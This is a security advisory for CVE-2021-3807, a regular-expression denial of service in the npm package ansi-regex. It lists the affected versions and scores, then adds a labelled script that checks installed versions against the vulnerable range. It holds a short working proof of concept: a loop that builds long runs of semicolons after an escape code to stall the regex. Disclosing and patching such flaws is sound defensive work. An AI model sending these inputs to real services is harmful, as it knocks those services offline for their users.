CVE-2021-3807 – ansi-regex
Package
Manager: npm
Name: ansi-regex
Vulnerable Version: >=6.0.0 <6.0.1 || >=5.0.0 <5.0.1 || >=4.0.0 <4.1.1 || >=3.0.0 <3.0.1
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS: 0.00215 (percentile 0.44093)
Details
Inefficient Regular Expression Complexity in chalk/ansi-regex

ansi-regex is vulnerable to Inefficient Regular Expression Complexity, which could lead to a denial of service when parsing invalid ANSI escape codes.

**Proof of Concept**

```js
import ansiRegex from 'ansi-regex';

// Each iteration feeds a longer run of ";" after an escape introducer and
// measures how long the regex takes to reject it.
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = "\u001B[" + ";".repeat(i * 10000);
  ansiRegex().test(attack_str);
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
```

The ReDoS is mainly due to the sub-patterns `[[\\]()#;?]*` and `(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*`.
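The fix for this advisory is to move to a patched release, so the practical question is whether a given installed copy of ansi-regex falls inside the vulnerable range above. The following is an added example, not code from the advisory or from the ansi-regex project: a small npm-style range matcher that takes the range string copied from this advisory and reports which installed versions are affected. The version list it is run on is constructed for illustration; pre-release and build suffixes are ignored, which is an assumption of this example.

```javascript
// Added example (not from the advisory or the ansi-regex project).
// Range string copied from the advisory's "Vulnerable Version" field.
const VULNERABLE_RANGE =
  ">=6.0.0 <6.0.1 || >=5.0.0 <5.0.1 || >=4.0.0 <4.1.1 || >=3.0.0 <3.0.1";

// Parse "MAJOR.MINOR.PATCH" into numbers. Pre-release/build suffixes are
// ignored here (an assumption of this example, not of the advisory).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`not a semver version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Returns -1, 0 or 1 like a comparator function.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// One comparator such as ">=6.0.0" or "<6.0.1" (bare version means "=").
function satisfiesComparator(version, comparator) {
  const m = /^(>=|<=|>|<|=)?\s*(\S+)$/.exec(comparator.trim());
  if (!m) throw new Error(`bad comparator: ${comparator}`);
  const op = m[1] || "=";
  const c = compareVersions(version, m[2]);
  switch (op) {
    case ">=": return c >= 0;
    case "<=": return c <= 0;
    case ">":  return c > 0;
    case "<":  return c < 0;
    default:   return c === 0;
  }
}

// npm-style range: "||"-separated alternatives, each a space-separated
// conjunction of comparators. The version matches if any alternative does.
function satisfiesRange(version, range) {
  return range.split("||").some((alt) =>
    alt.trim().split(/\s+/).every((cmp) => satisfiesComparator(version, cmp))
  );
}

function isVulnerable(version) {
  return satisfiesRange(version, VULNERABLE_RANGE);
}

// Given the ansi-regex versions found in a dependency tree (a lockfile
// commonly contains several nested copies), return the ones that need
// upgrading, de-duplicated.
function findVulnerableVersions(versions) {
  return [...new Set(versions.filter(isVulnerable))];
}

// Constructed sample: versions as they might appear across nested
// node_modules directories in one project.
const SAMPLE_VERSIONS = ["2.1.1", "3.0.0", "4.1.0", "4.1.1", "5.0.0", "5.0.1", "6.0.0", "6.0.1"];

console.log("vulnerable ansi-regex versions:", findVulnerableVersions(SAMPLE_VERSIONS));
```

Versions at or above each alternative's upper bound (3.0.1, 4.1.1, 5.0.1, 6.0.1) are reported as fixed, and versions below 3.0.0 fall outside the advisory's range entirely. Upgrading every vulnerable copy is the mitigation; a bound on the length of untrusted input passed to the regex only limits the damage.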
Metadata
Created: 2021-09-20T20:20:09Z
Modified: 2023-09-11T16:42:11Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json
CWE IDs: ["CWE-1333", "CWE-697"]
Alternative ID: GHSA-93q8-gq69-wqmw
Finding: F211
Auto approve: 1